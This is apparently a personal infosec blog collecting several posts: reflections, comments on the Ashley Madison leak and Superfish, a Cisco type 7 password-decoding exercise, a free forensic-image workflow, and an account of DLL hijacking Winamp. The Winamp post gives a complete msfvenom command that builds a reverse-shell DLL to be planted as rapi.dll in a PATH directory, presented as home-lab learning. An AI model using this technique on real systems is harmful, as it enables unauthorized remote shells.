A Point of Time

For some time now, I've been aware of parallels between parts of my life; personal, professional and educational experiences and lessons carrying over and crossing lines.  Until today, I've referred to them as parallels, like some sci-fi/Trekkie alternate dimension theory.  A more accurate way to reference this would see them as intersections.  Regardless, they fascinate me when I recognize them.  Generally, I see them as reinforcements.  I've been able to interpret them and recognize the subtle meanings I see.  For instance when I was taking an advanced forensics class for my Masters degree, an acute sudden need for an investigation at work using the same tools and techniques I was performing labs on for school (within one month of starting the class) was requested.  This was concluded by teaching a lower level forensics class @ ITT Tech, where I was an Adjunct.  Pretty straight forward.  In this situation, I was learning what I needed and having that knowledge reinforced through the demands of my job.  To bring it back full circle, I was teaching it, albeit at a lesser degree.

Things have changed a bit.  I've graduated, I'm not taking any classes either, and I'm not teaching since the relocation.  I've had a couple other 'intersections' since I've been here.  But generally, they are pretty standard life lessons; same as before, reinforcement of a experience.

This one feels different.  As I sat in my car for lunch, reading tweets and catching up on Infosec news, I became aware of another intersection.  What I failed to mention is historically, I've never seen more than 3 lines.  This time, there were 4. It might simply be coincidental and maybe a bit conspiracy fueled.  I think the 4th existed because I failed to recognize the second and third ones sooner.

It started yesterday, at lunch.  I haven't been going out to lunch a lot lately.  lately, it's been listening to music in my car, playing on my phone.  Ok, sometime I nap.  So hitting a Chinese buffet (on the other end of town) was just not in the plans.  What ever is being told, required me to go to lunch to get first line.
As with all Chinese dining, no meal is complete without a fortune cookie.  A slightly stale, sub-par quality treat holds the first of  the four intersections.

Intersection 1

Next came a post I found on an VERY old company site later than evening, rather accidentally.

Intersection 2

The last 2 game today, during lunch, while reading tweets, following links and reading blogs.  This one directly talks about what the 'old domain' didn't have; the ability to keep time...

Intersection 3 - Old, but new news
Courtesy of http://krebsonsecurity.com/2016/04/new-threat-can-auto-brick-apple-devices/

Intersection 4, I found in a series of links and blog posts that caught my eye.   Though only mentioned in passing, it was this intersection that caused me pause; another reference to time.

Intersection 4
from http://www.tenable.com/blog/tailoring-the-nist-cybersecurity-framework-for-a-precise-fit 

Without a contextual understanding of my life, saying what, if anything this means would be difficult, it not impossible.  I found these in a particular order for a reason.  Like all ovvrly interpretive symbolc fables, this too can be fulfilled after the fact.  One thing is sure, only time will tell.

Ashley Madison Data; That's not the issue

The Ashley Madison leak seems to have gripped the nation's interest.  We gawk and joke and pass judgement with such ease, it reminds me of a time before we were dominated by being politically correct.  But that's not the issue.  We paint a facade and romanticize aspects we find socially acceptable, as if we are even capable of having any true moral ambiguity, while chastising people that are more honest in their intent.  People using AM are honest in their intention; sexual encounter.  People going out to bars and night clubs are generally clear in their intentions; sexual encounter.  People using online dating sites romanticize their intentions, but be clear they're looking for a mate.... yes, looking to mate.   But that's not the issue.  It's all the same.  I've paid my share of covers at bars (non-refundable) in my time only to leave 10 minutes later.  There's no difference.  Guys pay for sex.  If you find that profound, you should try to elevate your thinking and take a look at how the world really works.  Now if your immediate assumption led you to a prostitute, you're narrow minded in your thinking or just naive.  While, yes, that is very true, not everything is monetary or can be quantified.  But that's not the issue.

I am just as guilty as everyone else; I talk and I'm curious.  Yet, I found myself turning off a security-based podcast from people I follow closely because after 35 minutes, they were still laughing and joking about people's lives and how stupid they were.  For some reason, this bothered me, yet it's the exact same thing everyone else, including myself has been doing all week.  I claim to have no higher moral bindings that anyone else, so this gossip doesn't bother me at all.  It's what we do.  It seems we're all curious who's on the list.  I can only guess it's because we love secrets.  But this isn't the issue.

In grand fashion as we Americans love to do, we take a breach of privacy and focus on the data, not the events behind the data.  The issue is the leak, not the data and certainty NOT what people were doing or not doing.  Regardless of your beliefs on what people should, or shouldn't do with their lives, as a security professional, privacy is something we're supposed to take very seriously.  We've enacted laws that, in effect, means that you could literally fall seriously ill, and not of one your coworkers would know to be concerned unless you personally told them of the illness.

The issue is the breach, the theft, and the loss of trust.  We're all entitled to privacy.   

Remember, privacy is a human right. We really don't need to explain why it is needed. - TED Radio Hour episode, The End Of Privacy,Mikko Hyppönen

 Let's shift our focus to the details behind the breach; how it happened and lessons learned.

Why Superfish Should NOT Have Impacted Businesses

The Twittersphere has been a blaze with privacy concerns stemming from Superfish and Privdog.  What I find most interesting is the amount of users running hardware supplied from their employer that were hit with this.  From a consumer standpoint, using a OEM computer with the OOBE setup and bloatware is the pretty standard trade off of privacy and adware for convenience and usability.  I'm a consumer, and yes, I use the images "as-is" for my family's hardware platforms when it comes to laptops.
If you've ever looked at the driver/software installation order from the OEM sites, the argument keep the system as built is compelling.  However, as your typical consumer of business hardware, I'd expect that the OEM built is not provided.  In the last 15 years, I've allowed a build of the OS and software to be outside of my control only a handful of times, and this latest offense strengthens my position to rebuild and reinstall the OS and applications personally or at least to understand what's been installed and configured.  Yes, this is a pain, but if I don't know what is installed what's been configured with some level of scrutiny, how can I trust it?  Using an OEM build and handing it your employees "as-is", as is the case with Superfish, shows an obscene lack of due diligence and respect and if you're in charge of an IT department tasked with deployments and hit with Superfish, fire who ever you're paying to do "Image Development" and rebuild your program; You're doing it wrong.

The Importance of Old Lessons; The Quest to be a Better Programmer

I've been spending as much time as possible working on small little programming exercises, mostly in C++ and PowerShell.  I'm pretty novice; I may never get past the horrible whack-and-hack code I often piece together.

When I first started my IA program, I had to take a crash course in C programming for non-CS grads.  I had the hardest time with the simplest of operations, looking for new functions to help.  For instance, it took me weeks to see the relationship between UPPER and lower case in the ASCII chart (+/- 32).  This stuck with me to this day, but a deep understanding of the lesson was still lacking.

Take the Cisco 7 Password crack examples; it's all over the Internet and is well known.  So, naturally, I figured I should be able to write my own code to do the same as everyone else.  No problem; I actually did this.  However, the OFFSET and the HEX values for the encrypted password had to be hard-coded in.  I wanted to accept user input.  This is where I got seriously stuck.  One of the ways I learn how something works is to observe it.  This means a lot of printing out variable and values when I'm working in some section of code I can't map out for some reason.  I'd been stuck trying to figure out how to extract the offset value of an encrypted password.  I was trying to concat elements of a char array as a single int value and a bunch of other crazy stuff.  I just couldn't figure it out

Then I came across this example that was so simple; subtract 48 from each character, using 10s and 1s place values and add together to get the offset.  I'm pretty bad at explaining, let me show you.

Encrypted password = 13061E010803
The offset is contained in the first byte; 13.  However when read into an array, you get:
char array[0] = 1
char array[1] = 3

However, as input a char, their stored values are 49 and 51.  I need to work with these as a decimals.  So, how do you convert?  Subtract 48 from each value.  You end up with 1 and 3.  **lesson**  Now I have the decimals the way I need them.... almost.  1 is in the 10's location, so if I multiply it by 10, I end up with 10.  3 is in the one's location, so if I multiply it by 1 I get 3 (don't need to multiply).  Add them together and you get 13!

So, had I looked or remembered the ACSII chart lesson from years ago, I might have gotten to this point on my own (or at least damn near close).

Live and Learn

DLL Hijacking Winamp

I've been a HUGE fan of Winamp since it's inception.  At the time, I was a modem support jockey, ironically enough, at AOL. (for those curious, that was about 1997).  Seems everyone today is perfectly fine with the stock crap that the vendors push for audio, which helps explain why the product is no longer officially around and instead, listed optimistically citing that "there's more coming soon".  Regardless, I still use the product and recently, learned of DLL Hijacking.
Obviously, this isn't anything new and I'm blissfully late to the party.  Regardless, it's worth looking at and learning more about.  "This issue is caused by applications passing an insufficiently qualified path when loading an external library".  The folks over at Offensive-Security have a great video on this here.  Like I said, I'm new to this topic for some unknown reason.

To test against Winamp, I first fired up procmon from Sysinternals. I start with 3 filters;

• Process Name is "Winamp.exe"
• Result is "name not found"
• Path ends with ".dll"  - This gets changed to the dll I'm looking for later

I started looking at the dlls one at a time and found rapi.dll.  I threw IDA free at Winamp.  Couldn't find rapi.dll as a string.  I modified the filter to look like the above pic, homing in on rapi.dll and launched the app again normally.  This is what I found.

That's a whole lot of paths it's searching.  What's really dangerous is that pretty much the entire system PATH was searched for this dll.  Notice, I have location defined outside of the protected %program files% space.  I chose to to test this using PYTHON27 dir.  Of course, the first thing we try is a Metasploit and a meterpreter package, right?  Sorta.  The DLL works completely on its own, but when called from the application, I get broke meterpreter session with a fully functional.  Must be a problem with the stager.  Let's just get shell. For now, settled on the following msfvenom build.

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.118 LPORT=8081 -f dll -a x86 --platform windows EXITFUNC=process > rapi.dll

BOOM!  However, the application is no longer functional.  Remember how I said I was totally new at IDA, reversing and the lot?  I'm pretty sure if I could find the call to rapi, I might be able to determine what it's expecting to have returned, and put that in my my own custom DLL.  All theory at this point.  BTW, rapi.dll appears to be related to mobile devices, but doesn't exist on either my Win7, Win8 or Win10 boxes.

In conclusion, while not exactly getting access to the box, this search order reveals paths that might have execution privileges, so when looking at needing to obtain more shells, this could lend itself slightly useful (well, maybe)

Dynamic Interaction Analysis of Forensics Images Using Completely Free Tools

A couple years, ago, when I was first introduced to forensics, I found it overwhelming to dig through static configuration files (Windows registry) when looking for data and over time, I failed to keep track of key registry locations I would need to exam.  I was lucky enough to have FTK available and items like the Registry Quick Find Guide was extremely helpful.  Today, went out looking for this, and can no longer locate it on Access Data’s site.  While FTK was extremely powerful, there are times were you want to interact with the system, for example, when doing dynamic analysis of a possibly compromised system.  I came across VFC @ http://www.virtualforensiccomputing.com/vfc-faq.php, but simply couldn’t afford this.  From the home lab perspective, I wanted a zero or no-cost solution for analyzing full raw (dd) images.

Zero Cost Solution:

·         VMware Player

·         FTK Imager

I’m going to assume you already have a RAW format image.  You could have used FTK, but that’s not important.  We’re going to use FTK Imager for the Disk Mounting utility.  What makes this awesome is the mounting the image as “Block Device /Writable”.  From the user guide:

“Allows you to write to the evidence, make notes, and so forth. the changes and

notations are saved in a cache file, but no changes are made to the original. If

selected, provide path information for the cache file in the Write Cache Folder field.”

Here’s the processing flow I use.

Start AccessData FTK Imager

Ø  File > Image Mounting

Ø  Select a dd file (raw)

Ø  Mount Type:  Physical & Logical

Ø  Drive Letter: Next Available

Ø  Mount Method: Block Device / Writable

** Don’t close FTK Imager**

**I assume you have used VMware and understand how to create/provision VMs.  Ideally, a custom .vmx file would be completely appropiate here.  Here, I’m assuming you know the basics.**

Create new VM.  Choose CPU and RAM.  Ideally, you should match what the physical machine had.  For the hard disk, just pick the defaults; we’re going to be deleting it and creating a new one anyway.  Once you’ve got your VM created, go back into the settings and let’s start by removing the Hard Disk and then adding a new one.

VMware Add Hardware Wizard

 Ø  Add Hard Disk

 Ø  Virtual Disk Type: IDE (adjust if you have issues)

 Ø  Select Disk : Use a physical disk, Usage: Use Individual Partitions

 Ø  Check all of the partitions listed

From there, fire up your VM.  Excessive disk paging and high CPU should be expected, especially during first launch while Windows loads/installs drivers.  You can do anything you need to, and FTK will take care of it, leaving the image intact.

Of course, with VMware Professional, you have more robust options.  This is how to do it on the super cheap!

Oh how heros sometimes change...

Growing up in a time where no father wanted his son to be a geek, the people, the men that I looked up to as heroes were MEN.  And as with all good idol worshiping, their tarnish never fades, despite any scandals or mishaps.  For me, the big action stars of the 90's; Arnold, Sly and Bruce.  Throw in a little modernization in there and I'll give you Statham as well.  I love what they do, and I respect that they know their place; entertaining the masses with awesome actions flicks.  These are my super heros, my Batman's and Iron Mans, and the like.  These iconic men define what a man should look like and what kind of skills they should possess.  Yet, these guys are getting old.... 

As I claw my way up trying to break into security, I have had to find new hero's to help me keep my dreams alive.  There's a slight problem.  Unlike the previous hero's, these men are more human, more personable, and more available, which in some eyes, diminishes their luster.  In a cliquish turn of the times, Geek is totally sheik, but Heroes are supposed to be the few and the elite.  They subtly remind you who is God and who must follow.  Many folks in InfoSec can easily fit the bill; if not, Rockstar status is an automatic.  The Good (and the Villains) often have sharp-witted battlecrys: "Try Harder", "You're doing it wrong" and "this has already been answered in a forum..." The problem with infosec for me is how good everyone I follow is, and how overwhelming the scene quickly becomes and how under educated and experienced I feel.  I've been beat down by nearly every professor at DSU at least one, reminding me who they are and why I am who I am.  Yet it matters not; the small price of admission to learn from the best and move into the career I want it well worth the pain of these Heroes.

Yet, there is hope.  There are a couple individuals that truly inspire.  Only a couple a months ago, I began to wonder where I could fit in all this.  I'm not likely to be Hero, or even a Rockstar.  Maybe a contributing member, but as I flail around in N00b status, it's hard to see the light.  About this time, I got to see a Video from DefCon 20, but David Kennedy.  This guy is the real deal and I'm hooked.  He's open with his talks, he shares his knowledge, and he inspires with to learn.  Dammit!  I will learn Python now!  It may take years, but I'll get it.  This guy is what the mold should be.

Yes, this is a weird post and in the midst of 2 grad classes, I'm determined to learn python and do something useful with it, which is far more than I can say about my trials with C.

Working 1-2 hours ago on it; still in N00b city, but I'm working at it.  I will get there.

So for now, Dave, keep on keeping on.  Looking forward to SET 4.0!